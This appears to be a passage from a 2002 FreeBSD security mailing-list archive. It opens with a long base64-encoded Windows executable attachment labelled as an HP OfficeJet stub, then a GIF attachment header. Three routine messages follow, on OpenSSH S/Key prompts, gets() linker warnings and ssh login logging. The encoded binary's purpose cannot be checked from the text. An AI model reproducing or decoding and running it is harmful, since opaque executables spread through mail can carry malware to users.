AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAgFRAAOABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAOCAAAAAAAAAAAAAAKKBAAB8gQAA2IAAAAAAAAAAAAAAvoEAAHSBAABQgAAA AAAAAAAAAAAMhAAA7IAAAAAAAAAAlkAAAAAAAAAAAAAAAAAAyoIAAOSCAAD8gwAA6oMAAMqBAADe gQAA8IEAAAKCAAAQggAAHIIAACaCAAAyggAAQIIAAFSCAABoggAAhIIAAJqCAAC0ggAAaoMAAHiD 
AAD8ggAAFoMAACyDAAA+gwAAToMAAFyDAACegwAAhoMAAJKDAADOgwAAsIMAAMKDAADagwAAAAAA ALCBAAAAAAAAiIEAAJSBAAAAAAAAyoIAAOSCAAD8gwAA6oMAAMqBAADegQAA8IEAAAKCAAAQggAA HIIAACaCAAAyggAAQIIAAFSCAABoggAAhIIAAJqCAAC0ggAAaoMAAHiDAAD8ggAAFoMAACyDAAA+ gwAAToMAAFyDAACegwAAhoMAAJKDAADOgwAAsIMAAMKDAADagwAAAAAAALCBAAAAAAAAiIEAAJSB AAAAAAAAAQBUQVBBU0xpbmsAAgBUQVBBU0xpbmtFeABocG90YXAwMy5kbGwAAJQBTWVzc2FnZUJl ZXAAVVNFUjMyLmRsbAAA/gBHZXRNb2R1bGVIYW5kbGVBAAAoAUdldFN0YXJ0dXBJbmZvQQCqAEdl dENvbW1hbmRMaW5lQQBMAUdldFZlcnNpb24AAKMAR2V0Q1BJbmZvAJ0AR2V0QUNQAAAJAUdldE9F TUNQAABrAEV4aXRQcm9jZXNzAEYCVGVybWluYXRlUHJvY2VzcwAA0wBHZXRDdXJyZW50UHJvY2Vz cwBQAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAA/ABHZXRNb2R1bGVGaWxlTmFtZUEAAJYARnJl ZUVudmlyb25tZW50U3RyaW5nc0EAqwFNdWx0aUJ5dGVUb1dpZGVDaGFyAJcARnJlZUVudmlyb25t ZW50U3RyaW5nc1cA4QBHZXRFbnZpcm9ubWVudFN0cmluZ3MA4wBHZXRFbnZpcm9ubWVudFN0cmlu Z3NXAABuAldpZGVDaGFyVG9NdWx0aUJ5dGUAGwJTZXRIYW5kbGVDb3VudAAAKgFHZXRTdGRIYW5k bGUAAO8AR2V0RmlsZVR5cGUAbAFIZWFwRGVzdHJveQBqAUhlYXBDcmVhdGUAAF4CVmlydHVhbEZy ZWUA5QFSdGxVbndpbmQAewJXcml0ZUZpbGUAKwFHZXRTdHJpbmdUeXBlQQAALgFHZXRTdHJpbmdU eXBlVwAAbgFIZWFwRnJlZQAAaAFIZWFwQWxsb2MAWwJWaXJ0dWFsQWxsb2MAABYBR2V0UHJvY0Fk ZHJlc3MAAJABTG9hZExpYnJhcnlBAABLRVJORUwzMi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAB+RDs4AAAAAAAAAgAGAAAAIAAAgBAAAAA4AACAAAAAAH5EOzgAAAAAAAAB 
AAEAAABQAACAAAAAAH5EOzgAAAAAAAABAAEAAABoAACAAAAAAH5EOzgAAAAAAAABAAkEAACAAAAA AAAAAH5EOzgAAAAAAAABAAkEAACQAAAAQJUAACwAAAAAAAAAAAAAAKCQAACgBAAAAAAAAAAAAACg uTQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAA BgAGAAcAPwAAAAAAAAAEAAEAAQAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu AGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBOQEvAMAAAEAUwB0AHIA aQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAmAMAAAEAMAA0ADAAOQAwADQARQA0AAAARAAWAAEAQwBv AG0AbQBlAG4AdABzAAAAVABBAFAAQQBTACAARQB4AGUAYwB1AHQAYQBiAGwAZQAgAFMAdAB1AGIA AABCAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAASABQAE8AVABBAFgAMAAz AC4ARQBYAEUAAAAAADIACQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAASABQAE8AVABBAFgA MAAzAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEgAZQB3AGwAZQB0AHQALQBQ AGEAYwBrAGEAcgBkACAAQwBvAC4AAAB8ACwAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgACgAYwApACAASABlAHcAbABlAHQAdAAtAFAAYQBjAGsAYQBy AGQAIABDAG8ALgAgADEAOQA5ADUALQAxADkAOQA4AAAAKAAAAAEATABlAGcAYQBsAFQAcgBhAGQA ZQBtAGEAcgBrAHMAAAAAAFQAFgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABU AEEAUABBAFMAIABFAHgAZQBjAHUAdABhAGIAbABlACAAUwB0AHUAYgAAADIACQABAEYAaQBsAGUA VgBlAHIAcwBpAG8AbgAAAAAAMAAxAC4AMAAwAC4AMAAwAAAAAABEABIAAQBWAGUAcgBzAGkAbwBu AEQAYQB0AGUAAAAAAE4AbwB2AGUAbQBiAGUAcgAgADIAMwAsACAAMQA5ADkAOQAAAFAAGAABAFAA cgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASABQACAATwBmAGYAaQBjAGUASgBlAHQAIABTAGUAcgBp AGUAcwAgADcAMAAwAAAAOgALAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAQQAuADAA NgAuADAANwAuADAANgAAAAAAVAAYAAEAUAByAG8AZAB1AGMAdABGAGEAbQBpAGwAeQAAAAAASABQ ACAATwBmAGYAaQBjAGUASgBlAHQAIABTAGUAcgBpAGUAcwAgADcAMAAwAAAALAACAAEAUAByAG8A ZAB1AGMAdABGAGkAbABlAEYAbABhAGcAcwAAADEAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBm AG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAACQTkBAAABgBUAEEAUABBAFMA eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAPlzF+gOAAAAA8fpDgAAADEuLTseRAD4G8DDwdgdwdh36ARyAAA4nxHAmBr7n0Q3jI37 M4WVQ2se1PwPLmdwS6pPpMWpMCh8CJRNvfo0rGBKAUMQ0j0MbFsSHUxtsCAkc4LohBEMobaeSKgO FtKN0B0cpiSdYm2E/TCmFSIVYRGD2dpmUWgFBmKe+HLCGVIVZqSon6PhsdmVMcPauknmxSNJFZYs A/IqdMle/O75Zmmg8nnYdyfuE7jS+24VWfbLaAeDEAQINQ7kzoNFsDIvbhu5lTPr+8LngJJ/bj/0 rmoft4MioovLUovuxym0dmZ3D+AJ5zQ6nyIAXAo326EDMyh+hFu+/wiXbMCX8RgxgaqtfI5t+pGX f8SgXTc56Ajned8fwfsoZ6jxr2Rb6G94IIvG1YDE9YdXieSWy3nDn7stHiYvE0ksMU7YsBruIM/W AVS2VXNUx2/np9Qjk9Ihje4Fm5jbNaFQIp7xDikOiRDnCODBO/Gx2VEqxKRHqxols0gveVJQgN4T 4uH71vJWaaLbPElnJo2Db0S7GYc+upkLOsUlEAVDmdxDjDfCR+nLAdYE+4P7Z2Lrj7oQwDD+NTrW +qU8Rg9LkPvSPBwYgfKza81IuP6P9ke9GKIH30NIkZE/kAIAK4vAgJb7iKOgPQwrjbJwmlW7c29N m8+5mFtuT4Q+N0uTXAiUMzSL8GhipHvRgLLNsMaI1Nupveycuh19hsmWidLQq0awGUKkRQyVwyUs uJhthIWf/falkaxKYslN2FElIqS5nnQ+goVnfGNHahZ5AK7W01i3tSkQ84cxbVIcINRfJMODzVJs Q/v1rx2vtq0zBR7MspELkI4mHLtx5hR396V+Ks6KUrASYtFrofNLPm5KYqJ/uocZL/5RospN5bhs ehoBa0L4pKlaUjelR2Jfy5w2vqwTekWwQyFtsSv6/Baqc0TAG5RsEaH6f2qMgukC0/uaw9zXS31Y EN7f5K7RFv0JUa6bM3F1/A8NfvNAXJzDgzhx1LbRTCMs8Rb4g2o806eeSEqALbEBVNHCZMrp7JJ7 9ELo5Sw6Yf7fRFh/md1dRgacdMx1Oh2BT4IpGbggxVrE2zsCadZNxw6FAhxrOU8J5nLr7tl3nCkr szvyg2UFFVXXJhA25UV4FMQTxyNnTt7SHvlVsP3v3evQ8vISil3rXCuVfrLlYwqH99otKnrCYgCC E6v0RlbaTCu5ajoG+eYdoR5mgPND+HbIH/l+P6PjmT5qEcNUibInZcs7PZD5+2H1GMjO85lUucbh HcUF8SYdOKZyjjgwoU1tSkAWw8xAtrSUibS+nKhwFrP+xImtr/ZIH/ISGwgdkbETTNij6cT6ddyb dM8huilZ7cbYUDzFiN5jndnP8ZGn9WPZrFsa2T5OPZrpPHTSkdHZE46zXmDv4rcQPQOtt3tRrTbP JwUeeweLbSwZsbavBhbP8veaS3eMvFQ9Z6ENL4+jyrtpSmJVY06F8m2omuAi7iH2q2zSdDHROWSm AnlDu0Hmf70CG9m1w3JR4ry6qFFP+QVqg9IEwBYVRAneppmIGm1ItB6NIGBhu0r2mLvVTVQ9uoWu 74iUSqEembE+nMaOgOJtt9Al/ZYPxtnaToVsZ33aYXzi3Ej3NtAEfDAkVJSFTXT5rH2oYanJjCHs vGwqUJfdMSAinmNBu5trVOd/pJpT41m+Pz62AOjb8oh60t2QmNRbOXbhdIS0HdZte7lsXA9qBx6D 2vRu4e8sNct0gl9hZ5lu660+6pjiWq2Ho/KiK57PeUCGPx6ybL69TCcqNCVc4xmXK0Go9CYfhoBC 
1Hf/Sgq9jEyDIgaxQ3p2a29oaXQvQNOAlcfNk3J2CW6PqyWRQwyH0yDJ2mXrXQnf1K1nxi2jepow HHNP12PoBs2AoM6iQzPUHe8LxkrW3ZANUCjJM1lZobQ10nnZRYbvEXxTi2yEEBRgMNQI4eSlLzE5 KVAy47TeY0LlPzEU5/PfHYPfsTG6L7Z1rRN5q6DR7eSXpjv/NuI8k70kRmko+vvnwyMFHg/HLmMs F1IrunFm2qASGz4qtmwKWXi2UpAOUlWNKUlio7yvniLLpiFoSVVbLy6EWL5qQlRNHI/xs1yGEMn9 jk48/YNSiw20mwX7Yk1biek3rBOV60jZFG58HxirNZFQO0qrTy5O9JhRBPrDq31FZf59rpkvjWNI Y6NazIBshVPTKAHqSs445xBBhDiB2f07UEzYjvcS4LcRGCv9b22L51x6faqAlIx3gBWzuZYqaEuu Yp6cXaau4RRiMmqdcCNOJrDdO9DBeDYu3ikCGxvLdFl24jLNY/ofk9THIdtbpUUeAtoNv2wWugda 8Oub2ScQnrrRQySgUqo9/3Nba6EpSZ1AWry+sbPczu+1ZRE/LSTiAf9VErQGvA4GSLSnT0IbWpqs g4EHr0MMyUvxqU77qSdEMjtqN0jEQ/FMrMIWxtCqCrDn3Db0CMDp36Qa4wIPmsddKogiFMj/Rslb EEl256uq5I1cNjbclL1QOtbRBIx7fAgeJIOCHDAkYKWFHXT+8HL4YUntdFXvkUg9Vvcd2q7jzDTm q6das6fxA0g1j09s96T2VddUDqkXLKsjBVfM2eVyJ8+rMbyke4/wCUKcjRqkMhOobAW6csX7uPNE p3raKbZr0E56fQaHc92i+wYuBK/6XImwI/7c3QxrsWgUrAJ4qjSpZGb/YIAdc7Vt14/2oHWjyrlh k47ljtpodm830MM2k9lIPbQ1CRGOPIUBLSsD5t93KyFwT2lOFLwHYRFM1wSEnjOx4MlNWM+pWdW2 0Iq2kDlFhpyT/cANDOqxKODbGEwwLVFQStGsFsANi2qI96hhX3+pfG/d8vUGZ9yEDDmJY6YjKj4Q 56C8jGdb79m0SzczaMD7sZOaohrhPOc5ZWd39O650lcr3gZwpyN5qNE0upnhmVr3y2DeX2NmDvtp UtGvPzKKF7eSz6HrZ3sKpuVVjcUls9S/1B/H18M+p+0yqP/W5l9pNjqkpi8wyGNhjIKvm3XFShUC ftXl/iPHR+oFSNe8L/3hAHU6dVKkmBJjkQ4mhMg8NkphXl4hj0vf7OU5jXBh/LXT+X/RQRdAoNmZ OSxl3MJiF0AFLojH5OVIHYnY7iy+eaXGw/1h4qLkmCB1EmalyuXGjUgHWAyUDxPfAae6cbun7kIY sHsSbJt89DXA4lMrN4FvuahhyH7l3h0JzSh+eStTPAMvI+Qdftr1pWwDUo5lUCYfyaUC6k0l+z5G 4jyMb5Ggr9tnwKf6dj2m0K3+tEABXifQqWJyNYtDg/IhygsWjR/1H71sqZOvgBIGZE4KBdksA9WO vGexUAVEvAjnBJmC9KmjhJZaGgDXvEBACN2PqNOdWUPq/fMzeEuMYDA8SVao/RSWoACfXGm9HoRM AXr04yQdhyaAukhoQUA0jD0RJ8tjrYlIi2cSX+DSsM3L0bWV4r/LcoTxGOuUFOqJJfvuMUc8W/PY N94poLUKNSor2/51hShXidRyi5oaKCamu6QF5lSGkx1NUNrp/GIqhHvfhs+42N/72CabX74Sahr/ vk+RaicnYyp2rS4gtkOCDtNaogq8wDJM+sP/KWN/z6MkZOcPvYC5hTwRusavQgilP3Psw/2hJ/TB lea5mbCXSRG6Bar+T3jkH0AHSs/sXKm9dKzext6KNgTY4vtTyGi60Hzb2UUEQJ40FAkTE9yQlb5p 
gVwM1hq5oLlb0JRE2LsJe1JNdnoPIfl/Ly1XIBNEh8yFoMqZmrKcYlWR6PCx5e1wiCCq2kimXjP9 lux1KVePSnD8964dROI+bWOP5jbttqz6NyPU9SIW+GnndGnOG0892jHES07uFWu8PuJnP4DSiaA2 2sD2gFbVNJE1/loDv0qjPt1ZAkz6r/J/bYuPs7plhRWra1mRrwWy9I7GLEaXj+PC/ZOjO1AUJdYU bhYJENG0nlTw+1yHFuM7z2feDKmULO/GM482BMsKjECySt3EN+5hjUxAnXNvau6DTB///MPUHIcu B3qcDE8vET8p0ZhqfxrcCYQtu5MMtnOwRFAl3Ah3bjCzVDb4OWDewGF1fNhdVM+OsFUnowXnOEGs Vvsa8QngOuDG46fo6aNyk2sySZer36Y164FoydxMi8waT/c6K/Wa3QilVv8LIumSHW1ZMDvHzye+ VT12g2H+sR4uCzI+qU/livq/4WJOUM+zuvpgND4rphOageKRbNNmckf6DLfwAkWwUPdPTJ4ig5mf wriINhW7VyIa6+a6ltqnvVT04EPnKZ7S6gqMsz1pOEE37um1hrqSRRL8/oNMZh0/CGHffCgcrNht 3kD5j2Q01+sF/XtMhOB2t3GyVyC7PxxOpV9eWza+nKhU6EWwkWY3P1P8K81cZLysQgK4eqBJ3pD2 U0uQ8ct3gXYoDnw/KiF02JMSW1lOEHEdb/TbnynNCi19mmx7E2baFBlW/IbYKZyilPFyRqjH+Z7G UfQwHQK6ytSlPYDb54OpV9YcqDqqmm2UiAwvoYw5KCyXvA2b1m/G0D4KQc9GI6TDHBUZmW7RqXUf OtPCntX/vaWYOdipVJ1HQimMTYD4+XWVYtENQmnoQaC0P+Ei5cnlhpx95uU9+wuGSqE8LHh9z6ea EEkLbwQJKDhCSkr/4LFGyBqSpD3kCgors30M0BLU7hv8GjXh+Rj57EiD5MJu9QiO/YDzEmhDjihi 5kfVxu64iq+u+8YaR4uHD4LrZ6nbZqxbOT5bgOHBuCsE3SBvq9JY6f/jQGwvJ/6akDQ8H0xDcwK0 J1qCCoM/CPv6js9h4Gd+v87QqM3sWW6JZxBSQ/clz5LCJt8gbBAkaYkbrtVcwZJvfoIm/ucPa9X9 HTT7NNQcC4XwPxIgFmnVuY9ZyRCnMlHRBezJr2EkK1IZxejKfDxblm1r68UZT3JCbKxekm+/MMXZ wBDV3xKOVtAl3D1gwXfgM6SOIU6S3ZwcyHzuSqKLrGklsNkYrHvyxqYF1J1T+9hydUfqNJchbxAq 8K50rSofYtnf8JgdaKD5rezeulqpk/KcZ2P2bxW2Sok8vyWizyO2WXhCBmKsqb51LmL+dmJyCoIu yVoC1w9fK4QZmMTSy/q4NAelMLBol1L6ZkKjvjLdxq/r/xnLHyKiNchdYpd8r9iwMBi6NEFW86Ls l+GCzzVa9T4tsLz7SGc1Nzd2TTHwddmzQ6++h9OcLPDca0tPslq0MMOe2EitQcou2gcUytaAjTfY MVLQHYBPoSg1z5P2se1Z3EVZc6kwEooez+VTKZVDO5Rt7h3hxQvtcXGT1wrmwR0RObXuAfRmtsMc Kw6uzBN18B02HJZzeqa6eSgt3iTzY+ZwdtlcFShit2OvJskO+6WV6x6fvR5++onebHF6zXIGal+6 HxfeYPZraja/S6KveY4jCMc/oshWQtJbuK8lDyzrdF7+UfY0rEA3gvGOZ/XNSn/wHYPnFpyXFsF/ BHalP7P4QgROJqDwlV1Nr3R7UxMtisSHWCyjdfzuCk6pjaxoCLl8w+sbTYlZ9tFzubVyx7YULNg8 GqCc2Ht2LfJD5nQ6oZucLB8ukhnO5bf8BMObAJhoiqO15OPwhfKWUtQ0bLCFH7KLMX5KIhKuzTVC 
------=_NextPart_000_00D1_016D2E25.CC2E2570 Content-Type: image/gif; name="CARDBACK.GIF" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="CARDBACK.GIF"
------=_NextPart_000_00D1_016D2E25.CC2E2570--
From owner-freebsd-security Tue Jan 15 6:55:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 13D8637B41A for ; Tue, 15 Jan 2002 06:55:23 -0800 (PST) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g0FEm7l93937 for ; Tue, 15 Jan 2002 08:48:07 -0600 (CST) (envelope-from 
admin@crimelords.org) Date: Tue, 15 Jan 2002 08:48:07 -0600 (CST) From: admin To: freebsd-security@FreeBSD.ORG Subject: Openssh btwn linux/bsd.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I ran into an issue (from only one slackware box) with S/Key authentication, wondered if anyone else sees this. The owner of the other box sent the question to openssh and the following is the answer..

--------------------------------------------------------------------------
> The above version of OpenSSH seems to work fine most of the time, but when
> I connect to one server in particular I get a very odd looking login
> prompt:
>
> pts/0::mugz!xm[~] ssh -l mugz
> otp-md5 414 cr6003 ext
> S/Key Password:
> otp-md5 265 cr4395 ext
> S/Key Password:
> otp-md5 332 cr9989 ext
> S/Key Password:
> user@host-name-omitted password:
>
> I enter my password 3 times in a row at this prompt, and then i get a
> "normal" login prompt and can login, what's up with this?

ssh -o preferredauthentications=password

This is (at least) caused by the fact that FreeBSD people have broken all setups without skey in use. It happened a few months ago with their FTP daemon, now it's happening with sshd.

--
Pekka Savola                 "Tell me of difficulties surmounted,
Netcore Oy                   not those you stumble over and fall"
Systems. Networks. Security.  -- Robert Jordan: A Crown of Swords
------------------------------------------------------------------------

The freebsd is running :
SSH Version OpenSSH_2.3.0 FreeBSD localisations 20010713, protocol versions 1.5/2.0. Compiled with SSL (0x0090601f).

The slack box is running :
OpenSSH_3.0.2p1, SSH protocols 1.5/2.0, OpenSSL 0x0090601f

Just a heads up if your users start asking about this, plus wanted to see if anyone had come across this before?
--emacs
From owner-freebsd-security Tue Jan 15 8:22:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 39BEA37B41F for ; Tue, 15 Jan 2002 08:22:32 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.6/8.11.4) id g0FGMGq00819; Tue, 15 Jan 2002 08:22:17 -0800 (PST) (envelope-from kris) Date: Tue, 15 Jan 2002 08:22:16 -0800 From: Kris Kennaway To: Alfred Perlstein Cc: Buliwyf McGraw , freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe Message-ID: <20020115082216.A792@citusc17.usc.edu> References: <20020114151955.I26067@elvis.mu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="/9DWx/yDrRhgMJTb" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020114151955.I26067@elvis.mu.org>; from bright@mu.org on Mon, Jan 14, 2002 at 03:19:55PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org
--/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Mon, Jan 14, 2002 at 03:19:55PM -0800, Alfred Perlstein wrote:
> * Buliwyf McGraw [020114 14:49] wrote:
> >
> > Hi... i was installing several applications (php,xmms,etc) on my
> > FreeBSD 4.4 server and i got the next message a lot of times when
> > i was compiling:
> >
> > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely;
> > consider using mkstemp()
> > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely;
> > consider using mkstemp()
> > /usr/lib/compat/libc.so.3: warning: this program uses gets(), which is
> > unsafe.
> > /usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the system!
> > /usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the
> > system!
> > /usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the system!
> > /usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the
> > system!
> > /usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), which
> > is not recommended.
> >
> > I want to fix this... what i can do?
> > Thanks for any help.
>
> Read the manpages, use the "Safer" version of the functions.

No, this is a FAQ; it's a bug in the linker which causes it to trip every single _warn_references() in the library when it links to libc, regardless of whether the program actually uses the functions in question.

Kris
--/9DWx/yDrRhgMJTb--
From owner-freebsd-security Tue Jan 15 8:56:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 10CB237B400 for ; Tue, 15 Jan 2002 08:56:44 -0800 (PST) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g0FGnNp94494 for ; Tue, 15 Jan 2002 10:49:23 -0600 (CST) (envelope-from admin@crimelords.org) Date: Tue, 15 Jan 2002 10:49:23 -0600 (CST) From: admin To: freebsd-security@FreeBSD.ORG Subject: Logging ssh??
Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I'm trying to get failed log-in attempts setup to go to my syslog or messages file (/var/log) and have had zero success. Openssh 2.9 on freeBSD4.4 stable

I must be missing something in the syslog.conf, so i put in the line

*.*,cron.none	/var/log/syslog

no spaces, only tabs...then 'touch /var/log/syslog'

I then tail the syslog file and fail to log in from 3 sources outside and see nothing.

sshd_config logging settings have been from default of

# Logging
SyslogFacility AUTH
